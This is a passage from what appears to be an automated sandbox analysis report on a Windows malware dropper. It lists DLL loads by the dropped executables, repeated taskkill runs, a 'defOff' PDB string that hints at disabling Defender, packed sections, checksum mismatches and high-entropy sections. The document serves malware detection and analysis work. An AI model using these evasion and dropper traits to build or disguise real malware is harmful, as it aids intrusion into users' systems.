Source: C:\Users\user\AppData\Local\Temp\1002711001\num.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1002711001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1002711001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002711001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1002711001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1002711001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002711001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1002711001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002711001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1002711001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002711001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002711001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002711001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1002711001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1002711001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002711001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002711001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1002711001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1002711001\num.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\GCVLAW8OP2HD5YHJC3.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\GCVLAW8OP2HD5YHJC3.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\GCVLAW8OP2HD5YHJC3.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\GCVLAW8OP2HD5YHJC3.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\compatibility.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 2985984 > 1048576
Source: file.exe Static PE information: Raw size of waasbvbn is bigger than: 0x100000 < 0x2ad600
Source: Binary string: my_library.pdbU source: 7a5878ed96.exe, 0000000A.00000003.2870739086.0000000004DEB000.00000004.00001000.00020000.00000000.sdmp, 7a5878ed96.exe, 0000000A.00000002.2911715801.00000000005EC000.00000040.00000001.01000000.0000000F.sdmp, num.exe, 0000001D.00000000.3018577142.00000000001BC000.00000008.00000001.01000000.00000017.sdmp, 7a5878ed96.exe, 0000001F.00000003.3079747725.000000000502B000.00000004.00001000.00020000.00000000.sdmp, 7a5878ed96.exe, 0000001F.00000002.3169928437.00000000005EC000.00000040.00000001.01000000.0000000F.sdmp, num[1].exe.8.dr
Source: Binary string: my_library.pdb source: 7a5878ed96.exe, 0000000A.00000003.2870739086.0000000004DEB000.00000004.00001000.00020000.00000000.sdmp, 7a5878ed96.exe, 0000000A.00000002.2911715801.00000000005EC000.00000040.00000001.01000000.0000000F.sdmp, num.exe, 0000001D.00000000.3018577142.00000000001BC000.00000008.00000001.01000000.00000017.sdmp, 7a5878ed96.exe, 0000001F.00000003.3079747725.000000000502B000.00000004.00001000.00020000.00000000.sdmp, 7a5878ed96.exe, 0000001F.00000002.3169928437.00000000005EC000.00000040.00000001.01000000.0000000F.sdmp, num[1].exe.8.dr
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 1664VO856PFRR45SNXLF.exe, 00000003.00000002.2439994017.0000000000C92000.00000040.00000001.01000000.00000006.sdmp, 1664VO856PFRR45SNXLF.exe, 00000003.00000003.2302933852.0000000004640000.00000004.00001000.00020000.00000000.sdmp, DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe, 00000020.00000003.3105769279.0000000004900000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Unpacked PE file: 3.2.1664VO856PFRR45SNXLF.exe.c90000.0.unpack :EW;.rsrc:W;.idata :W;xkeovjkc:EW;pxadkpqa:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Unpacked PE file: 4.2.NX5XML9A4AMIPXG5AGRT0AH025A0.exe.4d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ibghtiqx:EW;zeltcjlx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ibghtiqx:EW;zeltcjlx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 5.2.skotes.exe.dd0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ibghtiqx:EW;zeltcjlx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ibghtiqx:EW;zeltcjlx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 6.2.skotes.exe.dd0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ibghtiqx:EW;zeltcjlx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ibghtiqx:EW;zeltcjlx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Unpacked PE file: 31.2.7a5878ed96.exe.5c0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;tnleqdlj:EW;afcdkohf:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;tnleqdlj:EW;afcdkohf:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: num.exe.8.dr Static PE information: real checksum: 0x0 should be: 0xdb9be
Source: DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe.9.dr Static PE information: real checksum: 0x2b839c should be: 0x2c1493
Source: 7a5878ed96.exe.8.dr Static PE information: real checksum: 0x210957 should be: 0x21529d
Source: random[1].exe.8.dr Static PE information: real checksum: 0x2e73db should be: 0x2e1d2d
Source: E7HQ3XMUO6VYIDJ3F2DE2.exe.25.dr Static PE information: real checksum: 0x2b839c should be: 0x2c1493
Source: NX5XML9A4AMIPXG5AGRT0AH025A0.exe.0.dr Static PE information: real checksum: 0x1de46a should be: 0x1dafe6
Source: 1664VO856PFRR45SNXLF.exe.0.dr Static PE information: real checksum: 0x2b839c should be: 0x2c1493
Source: random[1].exe0.8.dr Static PE information: real checksum: 0x210957 should be: 0x21529d
Source: skotes.exe.4.dr Static PE information: real checksum: 0x1de46a should be: 0x1dafe6
Source: c1b0009d40.exe.8.dr Static PE information: real checksum: 0x2e73db should be: 0x2e1d2d
Source: file.exe Static PE information: real checksum: 0x2e73db should be: 0x2e1d2d
Source: GCVLAW8OP2HD5YHJC3.exe.9.dr Static PE information: real checksum: 0x1de46a should be: 0x1dafe6
Source: EGCHWF62L351BCP5BKZSSW.exe.25.dr Static PE information: real checksum: 0x1de46a should be: 0x1dafe6
Source: 1QL5CL9NMBWTM5JDZ.exe.11.dr Static PE information: real checksum: 0x1de46a should be: 0x1dafe6
Source: num[1].exe.8.dr Static PE information: real checksum: 0x0 should be: 0xdb9be
Source: I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe.11.dr Static PE information: real checksum: 0x2b839c should be: 0x2c1493
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: waasbvbn
Source: file.exe Static PE information: section name: tkrpbqpe
Source: file.exe Static PE information: section name: .taggant
Source: 1664VO856PFRR45SNXLF.exe.0.dr Static PE information: section name:
Source: 1664VO856PFRR45SNXLF.exe.0.dr Static PE information: section name: .idata
Source: 1664VO856PFRR45SNXLF.exe.0.dr Static PE information: section name: xkeovjkc
Source: 1664VO856PFRR45SNXLF.exe.0.dr Static PE information: section name: pxadkpqa
Source: 1664VO856PFRR45SNXLF.exe.0.dr Static PE information: section name: .taggant
Source: NX5XML9A4AMIPXG5AGRT0AH025A0.exe.0.dr Static PE information: section name:
Source: NX5XML9A4AMIPXG5AGRT0AH025A0.exe.0.dr Static PE information: section name: .idata
Source: NX5XML9A4AMIPXG5AGRT0AH025A0.exe.0.dr Static PE information: section name:
Source: NX5XML9A4AMIPXG5AGRT0AH025A0.exe.0.dr Static PE information: section name: ibghtiqx
Source: NX5XML9A4AMIPXG5AGRT0AH025A0.exe.0.dr Static PE information: section name: zeltcjlx
Source: NX5XML9A4AMIPXG5AGRT0AH025A0.exe.0.dr Static PE information: section name: .taggant
Source: skotes.exe.4.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name: .idata
Source: skotes.exe.4.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name: ibghtiqx
Source: skotes.exe.4.dr Static PE information: section name: zeltcjlx
Source: skotes.exe.4.dr Static PE information: section name: .taggant
Source: random[1].exe.8.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name: .idata
Source: random[1].exe.8.dr Static PE information: section name: waasbvbn
Source: random[1].exe.8.dr Static PE information: section name: tkrpbqpe
Source: random[1].exe.8.dr Static PE information: section name: .taggant
Source: c1b0009d40.exe.8.dr Static PE information: section name:
Source: c1b0009d40.exe.8.dr Static PE information: section name: .idata
Source: c1b0009d40.exe.8.dr Static PE information: section name: waasbvbn
Source: c1b0009d40.exe.8.dr Static PE information: section name: tkrpbqpe
Source: c1b0009d40.exe.8.dr Static PE information: section name: .taggant
Source: random[1].exe0.8.dr Static PE information: section name:
Source: random[1].exe0.8.dr Static PE information: section name: .rsrc
Source: random[1].exe0.8.dr Static PE information: section name: .idata
Source: random[1].exe0.8.dr Static PE information: section name:
Source: random[1].exe0.8.dr Static PE information: section name: tnleqdlj
Source: random[1].exe0.8.dr Static PE information: section name: afcdkohf
Source: random[1].exe0.8.dr Static PE information: section name: .taggant
Source: 7a5878ed96.exe.8.dr Static PE information: section name:
Source: 7a5878ed96.exe.8.dr Static PE information: section name: .rsrc
Source: 7a5878ed96.exe.8.dr Static PE information: section name: .idata
Source: 7a5878ed96.exe.8.dr Static PE information: section name:
Source: 7a5878ed96.exe.8.dr Static PE information: section name: tnleqdlj
Source: 7a5878ed96.exe.8.dr Static PE information: section name: afcdkohf
Source: 7a5878ed96.exe.8.dr Static PE information: section name: .taggant
Source: DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe.9.dr Static PE information: section name:
Source: DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe.9.dr Static PE information: section name: .idata
Source: DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe.9.dr Static PE information: section name: xkeovjkc
Source: DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe.9.dr Static PE information: section name: pxadkpqa
Source: DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe.9.dr Static PE information: section name: .taggant
Source: GCVLAW8OP2HD5YHJC3.exe.9.dr Static PE information: section name:
Source: GCVLAW8OP2HD5YHJC3.exe.9.dr Static PE information: section name: .idata
Source: GCVLAW8OP2HD5YHJC3.exe.9.dr Static PE information: section name:
Source: GCVLAW8OP2HD5YHJC3.exe.9.dr Static PE information: section name: ibghtiqx
Source: GCVLAW8OP2HD5YHJC3.exe.9.dr Static PE information: section name: zeltcjlx
Source: GCVLAW8OP2HD5YHJC3.exe.9.dr Static PE information: section name: .taggant
Source: I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe.11.dr Static PE information: section name:
Source: I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe.11.dr Static PE information: section name: .idata
Source: I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe.11.dr Static PE information: section name: xkeovjkc
Source: I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe.11.dr Static PE information: section name: pxadkpqa
Source: I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe.11.dr Static PE information: section name: .taggant
Source: 1QL5CL9NMBWTM5JDZ.exe.11.dr Static PE information: section name:
Source: 1QL5CL9NMBWTM5JDZ.exe.11.dr Static PE information: section name: .idata
Source: 1QL5CL9NMBWTM5JDZ.exe.11.dr Static PE information: section name:
Source: 1QL5CL9NMBWTM5JDZ.exe.11.dr Static PE information: section name: ibghtiqx
Source: 1QL5CL9NMBWTM5JDZ.exe.11.dr Static PE information: section name: zeltcjlx
Source: 1QL5CL9NMBWTM5JDZ.exe.11.dr Static PE information: section name: .taggant
Source: E7HQ3XMUO6VYIDJ3F2DE2.exe.25.dr Static PE information: section name:
Source: E7HQ3XMUO6VYIDJ3F2DE2.exe.25.dr Static PE information: section name: .idata
Source: E7HQ3XMUO6VYIDJ3F2DE2.exe.25.dr Static PE information: section name: xkeovjkc
Source: E7HQ3XMUO6VYIDJ3F2DE2.exe.25.dr Static PE information: section name: pxadkpqa
Source: E7HQ3XMUO6VYIDJ3F2DE2.exe.25.dr Static PE information: section name: .taggant
Source: EGCHWF62L351BCP5BKZSSW.exe.25.dr Static PE information: section name:
Source: EGCHWF62L351BCP5BKZSSW.exe.25.dr Static PE information: section name: .idata
Source: EGCHWF62L351BCP5BKZSSW.exe.25.dr Static PE information: section name:
Source: EGCHWF62L351BCP5BKZSSW.exe.25.dr Static PE information: section name: ibghtiqx
Source: EGCHWF62L351BCP5BKZSSW.exe.25.dr Static PE information: section name: zeltcjlx
Source: EGCHWF62L351BCP5BKZSSW.exe.25.dr Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016A5CD4 push ebp; ret 0_3_016A5CD7
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016A6EA1 push ecx; iretd 0_3_016A6FBA
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016A6EA1 push ecx; iretd 0_3_016A6FBA
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016A6EA1 push ecx; iretd 0_3_016A6FBA
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016A44B9 push esp; retf 0_3_016A44D2
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_06128224 push es; iretd 0_3_06128225
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_06128224 push es; iretd 0_3_06128225
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_06128224 push es; iretd 0_3_06128225
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_06128058 push ebx; iretd 0_3_06128059
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_06128058 push ebx; iretd 0_3_06128059
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_06128058 push ebx; iretd 0_3_06128059
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016AD193 push 00000001h; ret 0_3_016AD1D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016AD193 push 00000001h; ret 0_3_016AD1D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016AD193 push 00000001h; ret 0_3_016AD1D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016AD193 push 00000001h; ret 0_3_016AD1D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016AD890 pushad ; ret 0_3_016AD891
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016AD890 pushad ; ret 0_3_016AD891
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016AD890 pushad ; ret 0_3_016AD891
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016AD890 pushad ; ret 0_3_016AD891
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016AD191 push 00000001h; ret 0_3_016AD1D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016AD191 push 00000001h; ret 0_3_016AD1D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016AD191 push 00000001h; ret 0_3_016AD1D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016AD191 push 00000001h; ret 0_3_016AD1D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016A94D9 push eax; ret 0_3_016A9985
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016A94D9 push eax; ret 0_3_016A9985
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016A94D9 push eax; ret 0_3_016A9985
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016A6EA1 push ecx; iretd 0_3_016A6FBA
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016A6EA1 push ecx; iretd 0_3_016A6FBA
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016A6EA1 push ecx; iretd 0_3_016A6FBA
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016A97B9 push eax; ret 0_3_016A9985
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016A97B9 push eax; ret 0_3_016A9985
Source: file.exe Static PE information: section name: entropy: 7.981161103585447
Source: 1664VO856PFRR45SNXLF.exe.0.dr Static PE information: section name: entropy: 7.793394171507594
Source: NX5XML9A4AMIPXG5AGRT0AH025A0.exe.0.dr Static PE information: section name: entropy: 7.981331747856148
Source: NX5XML9A4AMIPXG5AGRT0AH025A0.exe.0.dr Static PE information: section name: ibghtiqx entropy: 7.955004268197834
Source: skotes.exe.4.dr Static PE information: section name: entropy: 7.981331747856148
